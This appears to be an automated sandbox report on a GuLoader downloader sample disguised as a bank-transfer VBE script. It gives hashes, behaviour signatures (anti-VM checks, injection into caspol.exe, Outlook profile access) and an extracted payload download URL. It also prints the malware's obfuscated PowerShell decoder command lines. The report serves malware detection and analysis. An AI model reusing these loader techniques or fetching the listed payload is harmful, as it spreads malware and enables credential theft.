Analysis
max time kernel: 71s
max time network: 141s
platform: windows7_x64
resource: win7-20221111-en
resource tags: arch:x64, arch:x86, image:win7-20221111-en, locale:en-us, os:windows7-x64, system
submitted: 02-02-2023 11:29
Static task: static1
Behavioral task: behavioral1
  Sample: transferencia.....vbe
  Resource: win7-20221111-en
Behavioral task: behavioral2
  Sample: transferencia.....vbe
  Resource: win10v2004-20220812-en
General
Target: transferencia.....vbe
Size: 60KB
MD5: 880b795347b76a1660b3dfcae7bc28f7
SHA1: dd398c1781ddd4f3e69036f4dadde6c643cacd44
SHA256: c1435f8fc9a6ffb253811a74d4016f73248b7226d6d5b458c3bf960ee3a38005
SHA512: e3ff92ca5ed3cc63bd8e1213a79dfc2574e0e39a126ece3d5890062eccc56ba23efe8f4301e71e3ad1fd3b1f88f9253e8d16d3fe0b73d5e78530f25cd80a7ccc
SSDEEP: 768:FlRe1yyO99pKzl2VT1Gxxy4tH/dD/ASEGZU2L7Y+yk10iGfzi945EriK:F3GyvLpylJxdfawKQNVMErd
Malware Config
Extracted
https://drive.google.com/uc?export=download&id=1dzg1926pnDm935d_Cm4TREqzX4j7oxJl
Signatures

Guloader,Cloudeye
A shellcode based downloader first seen in 2020.

Blocklisted process makes network request 2 IoCs
Processes: powershell.exe
- flow 4; pid 920; process powershell.exe
- flow 6; pid 920; process powershell.exe

Checks QEMU agent file 2 TTPs 2 IoCs
Checks presence of QEMU agent, possibly to detect virtualization.
Processes: powershell.exe, caspol.exe
- File opened (read-only); ioc C:\Program Files\Qemu-ga\qemu-ga.exe; process powershell.exe
- File opened (read-only); ioc C:\Program Files\Qemu-ga\qemu-ga.exe; process caspol.exe

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
Processes: caspol.exe
- Key opened; ioc \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676; process caspol.exe
- Key opened; ioc \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676; process caspol.exe
- Key opened; ioc \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676; process caspol.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
- flow 15; ioc api.ipify.org
- flow 16; ioc api.ipify.org

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
Processes: caspol.exe
- pid 964; process caspol.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes: powershell.exe, caspol.exe
- pid 920; process powershell.exe
- pid 964; process caspol.exe

Suspicious use of SetThreadContext 1 IoCs
Processes: powershell.exe
- PID 920 set thread context of 964; pid 920; process powershell.exe; target process caspol.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes: powershell.exe, powershell.exe
- pid 1812; process powershell.exe
- pid 920; process powershell.exe

Suspicious behavior: MapViewOfSection 1 IoCs
Processes: powershell.exe
- pid 920; process powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes: powershell.exe, powershell.exe, caspol.exe
- Token: SeDebugPrivilege; pid 1812; process powershell.exe
- Token: SeDebugPrivilege; pid 920; process powershell.exe
- Token: SeDebugPrivilege; pid 964; process caspol.exe

Suspicious use of WriteProcessMemory 15 IoCs
Processes: WScript.exe, powershell.exe, powershell.exe
- PID 1952 wrote to memory of 1636; pid 1952; process WScript.exe; target process cmd.exe
- PID 1952 wrote to memory of 1636; pid 1952; process WScript.exe; target process cmd.exe
- PID 1952 wrote to memory of 1636; pid 1952; process WScript.exe; target process cmd.exe
- PID 1952 wrote to memory of 1812; pid 1952; process WScript.exe; target process powershell.exe
- PID 1952 wrote to memory of 1812; pid 1952; process WScript.exe; target process powershell.exe
- PID 1952 wrote to memory of 1812; pid 1952; process WScript.exe; target process powershell.exe
- PID 1812 wrote to memory of 920; pid 1812; process powershell.exe; target process powershell.exe
- PID 1812 wrote to memory of 920; pid 1812; process powershell.exe; target process powershell.exe
- PID 1812 wrote to memory of 920; pid 1812; process powershell.exe; target process powershell.exe
- PID 1812 wrote to memory of 920; pid 1812; process powershell.exe; target process powershell.exe
- PID 920 wrote to memory of 964; pid 920; process powershell.exe; target process caspol.exe
- PID 920 wrote to memory of 964; pid 920; process powershell.exe; target process caspol.exe
- PID 920 wrote to memory of 964; pid 920; process powershell.exe; target process caspol.exe
- PID 920 wrote to memory of 964; pid 920; process powershell.exe; target process caspol.exe
- PID 920 wrote to memory of 964; pid 920; process powershell.exe; target process caspol.exe

outlook_office_path 1 IoCs
Processes: caspol.exe
- Key opened; ioc \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676; process caspol.exe

outlook_win_path 1 IoCs
Processes: caspol.exe
- Key opened; ioc \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676; process caspol.exe
Processes
-
C:\Windows\System32\WScript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\transferencia.....vbe" 1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe cmd /c echo shell 2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Ligh = """…""";Function Overspende9 { param([String]$uegennytti); For($Mendicplant216=2; $Mendicplant216 -lt $uegennytti.Length-1; $Mendicplant216+=(2+1)){$Strmerens139 = $Strmerens139 + $uegennytti.Substring($Mendicplant216, 1)}; $Strmerens139;}$Bortska0 = Overspende9 'CaIGdEExXPr ';$Bortska1= Overspende9 $Ligh;if([IntPtr]::size -eq 8){.$env:windir\S*64\W*Power*\v1.0\*ll.exe $Bortska1 ;}else{&$Bortska0 $Bortska1;}" 2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function HTB { param([String]$uegennytti); $Eksam = ''; Write-Host $Eksam; Write-Host $Eksam; Write-Host $Eksam; $Unhasti = New-Object byte[] ($uegennytti.Length / 2); For($Mendicplant216=0; $Mendicplant216 -lt $uegennytti.Length; $Mendicplant216+=2){ $Unhasti[$Mendicplant216/2] = [convert]::ToByte($uegennytti.Substring($Mendicplant216, 2), 16); $Unhasti[$Mendicplant216/2] = ($Unhasti[$Mendicplant216/2] -bxor 210); } [String][System.Text.Encoding]::ASCII.GetString($Unhasti);}…" 3⤵
- Blocklisted process makes network request
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe" 4⤵
- Checks QEMU agent file
- Accesses Microsoft Outlook profiles
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads